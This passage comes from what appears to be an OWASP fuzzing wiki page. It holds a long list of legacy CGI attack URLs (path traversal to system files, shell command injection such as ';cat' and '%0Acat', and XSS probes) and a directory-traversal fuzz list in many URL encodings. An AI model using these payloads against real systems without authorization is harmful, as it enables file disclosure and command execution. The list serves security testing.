mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
